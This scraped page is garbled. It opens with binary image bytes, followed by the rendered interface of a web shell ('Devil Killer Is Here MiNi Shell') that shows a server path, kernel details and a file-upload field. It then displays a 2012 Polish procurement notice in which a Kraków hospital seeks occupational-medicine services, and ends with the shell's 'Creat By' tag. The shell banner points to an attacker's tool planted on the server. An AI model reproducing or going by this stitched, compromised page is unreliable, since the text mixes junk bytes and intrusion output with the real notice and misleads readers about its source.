JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121030/423864-N-2012.html

<p class="kh_header"><b>Kraków: Usługa przeprowadzania badań wstępnych, okresowych i kontrolnych pracowników Szpitala Specjalistycznego im. Ludwika Rydygiera w Krakowie sp. z o.o. 
oraz udzielania innych świadczeń zdrowotnych z zakresu służby medycyny pracy, do których zapewnienia i sfinansowania zobowiązany jest pracodawca</b><br>
<b>Numer ogłoszenia: 423864 - 2012; data zamieszczenia: 30.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny im. Ludwika Rydygiera w Krakowie spółka z ograniczoną odpowiedzialnością , os. Złotej Jesieni 1, 31-826 Kraków, woj. małopolskie, tel. 12 64 68 502, faks 12 64 68 930.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rydygierkrakow.pl/umowy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Szpital sp. z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa przeprowadzania badań wstępnych, okresowych i kontrolnych pracowników Szpitala Specjalistycznego im. Ludwika Rydygiera w Krakowie sp. z o.o. 
oraz udzielania innych świadczeń zdrowotnych z zakresu służby medycyny pracy, do których zapewnienia i sfinansowania zobowiązany jest pracodawca.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zawarcie umowy zlecenia z podstawową jednostką służby medycyny pracy w rozumieniu ustawy z dnia 27 czerwca 1997r. o służbie medycyny pracy (tekst jednolity Dz. U. z 2004r. Nr 125, poz. 1317 z późn. zm.) na sprawowanie przez 36 miesięcy profilaktycznej opieki zdrowotnej nad pracownikami Szpitala Specjalistycznego im. Ludwika Rydygiera w Krakowie sp. z o.o. oraz udzielaniu innych świadczeń zdrowotnych z zakresu służby medycyny pracy i wykonywanie innych czynności, do których zapewnienia 
i sfinansowania zobowiązany jest pracodawca na podstawie Kodeksu pracy, ustawy z dnia 27 czerwca 1997 r. o służbie medycyny pracy oraz innych przepisów powszechnie obowiązujących. 
2.Świadczeniami z tytułu zawartej umowy o świadczeniu usług objęci będą pracownicy Zamawiającego oraz osoby wykonujące prace na rzecz Zamawiającego na podstawie umowy zlecenia lub umowy o udzielanie świadczeń opieki zdrowotnej, jeżeli nie prowadzą działalności gospodarczej na własny rachunek, zwani w treści umowy pracownikami. 
3.Okresowym badaniom lekarskim podlegać będą także pracownicy zatrudnieni w czasie pracy 
u Zamawiającego, w warunkach narażenia na działanie substancji, czynników rakotwórczych, 
po rozwiązaniu stosunku pracy, jeżeli zgłoszą wniosek o objęcie takimi badaniami. 
4.Zamawiający dopuszcza wykonywanie usług będących przedmiotem zamówienia na rzecz osób trzecich, tj. zleceń z zewnątrz dla jednostek, z którymi Spółka będzie mieć podpisane umowy 
w zakresie medycyny pracy.
5.Liczba pracowników Zamawiającego na dzień 15 października 2012r. wynosiła 1283 osoby. 
6.Zamawiający wymaga, aby usługi wynikające z zawartej umowy świadczyło nie więcej niż dwóch lekarzy i nie więcej niż dwie pielęgniarki.
7.  Szczegółowy zakres przedmiotu zamówienia: 
1)  sprawowanie profilaktycznej opieki zdrowotnej nad pracownikami Szpitala Specjalistycznego  
im. Ludwika Rydygiera w Krakowie sp. z o.o., w szczególności przez:
a)  wykonywanie badań wstępnych, okresowych i kontrolnych przewidzianych w Kodeksie pracy, 
b)  wykonywanie badań wstępnych, okresowych i kontrolnych osób narażonych na czynniki szkodliwe 
lub uciążliwe, takie jak:
promieniowanie jonizujące, 
promieniowanie i pola elektromagnetyczne,
promieniowanie laserowe,
zagrożenia związane z obsługa monitorów ekranowych,
oświetlenie niedostateczne,
czynniki toksyczne (cytostatyki, tlenek etylenu),
czynniki biologiczne (wirus zapalenia wątroby typu B (HBV), wirus zapalenia wątroby typu C (HCV),    ludzki wirus niedoboru odporności nabytej (HIV)),
niekorzystne czynniki psychospołeczne - zagrożenia wynikające z pracy na stanowiskach decyzyjnych i związanych z odpowiedzialnością,
prace na wysokości do 3 m,
praca zmianowa,
praca fizyczna z wydatkiem energetycznym na prace powyżej 1500kcal/8godz lub 3kcal/min dla mężczyzn powyżej 1000 kcal/8 godz lub ponad 2kcal/min dla kobiet,
kierowanie pojazdami w ramach obowiązków służbowych przez osoby posiadające prawo jazdy kategorii A, A1, B, B1, B+E, T,
c)  orzecznictwo lekarskie do celów przewidzianych w Kodeksie pracy i w przepisach wydanych na jego podstawie,  
d)  ocena możliwości wykonywania pracy lub pobierania nauki uwzględniająca stan zdrowia 
i zagrożenia występujące w miejscu pracy lub nauki, 
e) prowadzenie działalności konsultacyjnej, diagnostycznej i orzeczniczej w zakresie patologii zawodowej, 
f)  prowadzenie czynnego poradnictwa w stosunku do chorych na choroby zawodowe lub inne choroby związane z wykonywaną pracą, 
g)  wykonywanie szczepień ochronnych, o których mowa w art. 17 ustawy z dnia 6 września 2001 r. 
o chorobach zakaźnych i zakażeniach (Dz.U. Nr 126, poz. 1384 z późn. zm.), 
h)  monitorowanie stanu zdrowia osób pracujących zaliczanych do grup szczególnego ryzyka, 
a zwłaszcza osób wykonujących pracę w warunkach przekroczenia normatywów higienicznych, młodocianych, niepełnosprawnych oraz kobiet w wieku rozrodczym i ciężarnych, 
i) wykonywanie badań umożliwiających wczesną diagnostykę chorób zawodowych i innych chorób związanych z wykonywaną pracą,
j) poddawanie badaniom pracowników w związku z wypadkiem przy pracy z materiałem biologicznym potencjalnie zakaźnym, 
2) inicjowanie i realizowanie promocji zdrowia, a zwłaszcza profilaktycznych programów prozdrowotnych, wynikających z oceny stanu zdrowia pracujących,
3)  inicjowania działań Zamawiającego na rzecz ochrony zdrowia pracowników i udzielania pomocy 
w ich realizacji, a w szczególności w zakresie: 
a)  informowania pracowników o zasadach zmniejszania ryzyka zawodowego; 
b)  wdrażania zasad profilaktyki zdrowotnej u pracowników należących do grup szczególnego ryzyka; 
c)  tworzenia warunków do prowadzenia rehabilitacji zawodowej; 
d)  wdrażania programów promocji zdrowia; 
e)  organizowania pierwszej pomocy przedmedycznej, 
4) prowadzenia analiz stanu zdrowia pracowników, a zwłaszcza występowania chorób zawodowych 
    i ich przyczyn oraz przyczyn wypadków przy pracy; 
5) współpracy z komórką bhp w wypełnianiu wywiadu zawodowego dla celów ZUS,
6) wypełniania druku protokołu w związku z wypadkiem przy pracy z materiałem biologicznie zakaźnym,
7) prowadzenia rejestru orzeczeń lekarskich dotyczących przeciwwskazań zdrowotnych do pracy na określonym stanowisku dla potrzeb bhp, 
8) gromadzenia, przechowywania i przetwarzania informacji o narażeniu zawodowym, ryzyku zawodowym i stanie zdrowia osób objętych profilaktyczną opieką zdrowotną,
9) uczestniczenie w komisjach ds. bezpieczeństwa i higieny pracy oraz zebrań komitetu ds. zakażeń szpitalnych,
10) przedstawienia Zamawiającemu harmonogramu przeglądu stanowisk pracy w celu umożliwienia
Wykonawcy dokonania tego przeglądu, w taki sposób żeby przegląd wszystkich stanowisk pracy            był możliwy w ciągu sześciu miesięcy od podpisania niniejszej umowy oraz przedstawienia Zamawiającemu na piśmie wyników tego przeglądu,
11) dokonywanie na bieżąco przeglądu nowych stanowisk pracy oraz przeglądów kontrolnych wszystkich stanowisk pracy co najmniej 1 raz w roku, 
12) prowadzenie dokumentacji medycznej pracowników, 
13) poddanie się kontroli uprawnionego organu służby medycyny pracy,
14) informowanie Zamawiającego o zmianie przepisów lub nowych przepisach w dziedzinie służby medycyny pracy. 
       8.Obowiązki Zamawiającego:
a)  przekazywanie Wykonawcy informacji o występowaniu czynników szkodliwych dla zdrowia 
lub warunków uciążliwych wraz z aktualnymi wynikami badań i pomiarów tych czynników,
b) informowaniu o posiedzeniach i planach pracy komisji ds. bezpieczeństwa i higieny pracy oraz komitetu ds. zakażeń szpitalnych, działających u Zamawiającego,
c) zapewnienie możliwości przeglądu stanowisk pracy w celu dokonania oceny warunków pracy,
d) udostępnienie dokumentacji wyników kontroli warunków pracy, w części odnoszącej się do ochrony
zdrowia,
e) wyposażenie pomieszczeń, w których zlokalizowany zostanie Gabinet Lekarza Medycyny Pracy, jego oznakowanie oraz utrzymywanie tych pomieszczeń w czystości.
       9. Zasady funkcjonowania Gabinetu Medycyny Pracy: 
a) przyjmowanie przez Wykonawcę pracowników odbywać się będzie w Gabinecie Lekarza Medycyny Pracy;
b) Gabinet Lekarza Medycyny Pracy czynny będzie codziennie od poniedziałku do czwartku 
w godzinach od 8.00 do 14.00 . Lekarz przyjmować będzie pacjentów w Gabinecie w godzinach 
od 10.00 do 14.00 w poniedziałki, w środy i w czwartki;
c) lekarz przyjmujący w Gabinecie Lekarza Medycyny Pracy i uczestniczący w przeglądzie stanowisk pracy, musi spełniać wymagania kwalifikacyjne określone w odrębnych przepisach dla lekarzy wykonujących badania profilaktyczne oraz profilaktyczną opiekę zdrowotną niezbędną z uwagi na warunki pracy pracowników.
10.Organizacja udzielania świadczeń zdrowotnych:
1)	badania okresowe i kontrolne przeprowadzać należy, jeżeli jest to możliwe, w siedzibie Zamawiającego, w godzinach pracy pracowników;
2)	informację o czasie pracy Gabinetu Lekarza Medycyny Pracy, godzinach przyjęć oraz nazwiska 
i osób lekarza i pielęgniarki przyjmujących w Gabinecie - Wykonawca jest zobowiązany umieścić przed wejściem do Gabinetu;
3)	badania wstępne, okresowe, kontrolne, Wykonawca przeprowadza na podstawie skierowania. Skierowanie na badanie pracownik otrzymuje z Sekcji Zarządzenia Zasobami Ludzkimi. 
W  skierowaniu Sekcja Zarządzania Zasobami Ludzkim wpisuje nazwisko pracownika, miejsce          zatrudnienia, stanowisko i datę urodzenia;
4)	na skierowaniu, o którym mowa w pkt. 3 pracownik służby BHP Zamawiającego wpisuje czynniki szkodliwe lub warunki uciążliwe dla zdrowia występujące na tych stanowiskach; 
5)	inne badania, do przeprowadzenia, których jest zobowiązany Wykonawca, przeprowadza się po zarejestrowaniu w Gabinecie Lekarza Medycyny Pracy z inicjatywy pracownika albo ze wskazań Lekarza Medycyny Pracy;
6)	Wykonawca zleca wykonanie badań analitycznych i specjalistycznych niezbędnych dla wystawienia zaświadczenia wyłącznie komórkom organizacyjnym Zamawiającego 
albo podmiotom zewnętrznym, z którymi Spółka ma podpisaną umowę na udzielanie świadczeń zdrowotnych, na koszt Spółki;
7)	rejestracja pracowników do Gabinetu Lekarza Medycyny Pracy odbywa się w godzinach pracy Gabinetu. Rejestracji można dokonać osobiście, telefonicznie, a także za pośrednictwem innej osoby. Rejestracji dokonuje się na konkretna godzinę. Osoba dokonująca rejestracji informuje pracownika o dniu i godzinie przyjęcia przez lekarza, wręczając mu informację o tym na piśmie;
8)	pracownika, któremu badania przeprowadza się ze wskazań Lekarza Medycyny Pracy, zaprasza się na badania na piśmie. Lekarz jest zobowiązany uzasadnić pracownikowi potrzebę przeprowadzenia badania. Informację o potrzebie przeprowadzenia badania i poinformowaniu pracownika oraz o wyniku badania, lekarz przekazuje do Sekcji Zarządzania Zasobami Ludzkimi;
9)	jako zasadę ustala się, że przyjęcie pracownika przez lekarza, po jego zarejestrowaniu, nastąpi 
w najbliższym dniu jego ordynacji. W razie zmiany godziny przyjęcia albo dnia przyjęcia, Wykonawca jest zobowiązany zawiadomić o tym zarejestrowanych pracowników, w sposób ustalony z nimi wcześniej przy rejestracji;
10)	kopię zaświadczenia lekarskiego o zdolności do pracy, lekarz Wykonawcy wystawiający zaświadczenie, przekazuje bezpośrednio do Sekcji Zarządzania Zasobami Ludzkimi w tym samym dniu, w którym zostało wydane. Oryginał zaświadczenia lekarskiego przekazuje się pracownikowi, którego dotyczy. Adnotację o przeprowadzonym badaniu i wystawionym zaświadczeniu lekarz umieszcza w dokumentacji medycznej pracownika.
11.Szczegółowy zakres zadań i czynności Wykonawcy zawiera załącznik nr 1 do SIWZ, stanowiący integralną część niniejszej specyfikacji.
12.Opis zamówienia:
a)	nie dopuszcza się składania ofert częściowych;
b)	oferty nie zawierające pełnego zakresu przedmiotu zamówienia określonego w pkt. III specyfikacji zostaną odrzucone;
c)	Zamawiający nie dopuszcza możliwości składania ofert wariantowych. 
13.Zamawiający zgodnie z art.36 ust.4 ustawy żąda wskazania przez Wykonawcę części zamówienia, których wykonanie powierzy podwykonawcom. Zamawiający wyraża zgodę na zlecenie przez Wykonawcę niektórych obowiązków wynikających z umowy, zakładom opieki zdrowotnej 
lub podmiotom uprawnionym do wykonywania tych świadczeń na podstawie odrębnych przepisów. Koszty zleceń powierzone podwykonawcom ponosi Wykonawca.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający - stosownie do normy z art. 45 ust. 2 ustawy Prawo Zamówień Publicznych - NIE ŻĄDA WNIESIENIA WADIUM</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) oświadczenie potwierdzające, że Wykonawca posiada uprawnienia do wykonywania działalności lub czynności w zakresie usług stanowiących przedmiot niniejszego zamówienia, jeżeli przepisy prawa nakładają obowiązek ich posiadania - załącznik nr 3 do specyfikacji;
b)zaświadczenie o posiadanej przez lekarza, składającego ofertę lub lekarza - pracownika, który przyjmował będzie w Gabinecie Lekarza Medycyny Pracy   (w przypadku gdy ofertę składa zakład opieki zdrowotnej albo jednostka organizacyjna zakładu opieki zdrowotnej) specjalizacji (specjalności) oraz zaświadczenie lub inny dokument o przeszkoleniu w zakresie promieniowania jonizującego 
i posiadanych uprawnień do wykonywania badań w PEM i PX;
c) zaświadczenie o wpisie do rejestru indywidualnych (specjalistycznych)  praktyk lekarskich jeżeli ofertę składa lekarz prowadzący taką praktykę;
d) informacje o zgłoszeniu podjęcia działalności w zakresie profilaktycznej opieki zdrowotnej do Wojewódzkiego Ośrodka Medycyny Pracy;
e) w przypadku pielęgniarek: zaświadczenie o przebytym kursie kwalifikacyjnym w zakresie Medycyny Pracy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	oświadczenie, że posiada wiedzę i doświadczenie - załącznik nr 3 do specyfikacji;
b) polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony 
od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 200.000, 00 zł (w/w dokument należy dostarczyć dla poszczególnego lekarza).
Wykonawca zobowiązany jest do złożenia potwierdzenia przedłużenia i opłacenia umowy ubezpieczenia Odpowiedzialności Cywilnej, o której mowa pkt.b, najpóźniej w dniu wygaśnięcia poprzedniej umowy, a w przypadku składki najpóźniej w dniu upływu okresu, w którym składka miała być opłacona.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie, że dysponuje potencjałem technicznym zdolnym do wykonania przedmiotowego zamówienia - załącznik nr 3 do specyfikacji</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie, że dysponuje osobami zdolnymi do wykonania przedmiotowego zamówienia - załącznik nr 3 do specyfikacji</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie potwierdzające, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - załącznik nr 3 do specyfikacji</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)wypełniony formularz ofertowy (wg załączonego wzoru - załącznik nr 2 do specyfikacji),
b)dokumenty i oświadczenia potwierdzające spełnianie przez Wykonawców warunków udziału w postępowaniu (wymienione w Rozdz.VI,VII specyfikacji),
c)w przypadku Wykonawców działających przez pełnomocnika - pełnomocnictwo, 
o którym mowa w rozdziale VIII pkt 8b specyfikacji,
d)w przypadku Wykonawców wspólnie ubiegających się o zamówienie - dokument stwierdzający ustanowienie przez Wykonawców wspólnie ubiegających się 
o zamówienie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rydygierkrakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny im. Ludwika Rydygiera w Krakowie sp. z o.o.
Dział Zamówień Publicznych i Zaopatrzenia
31-826 Kraków, os. Złotej Jesieni 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.11.2012 godzina 09:30, miejsce: Ofertę w zapieczętowanej i oznaczonej kopercie należy składać w kancelarii pokój numer 238 lub wysłać listem poleconym na adres Spółki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
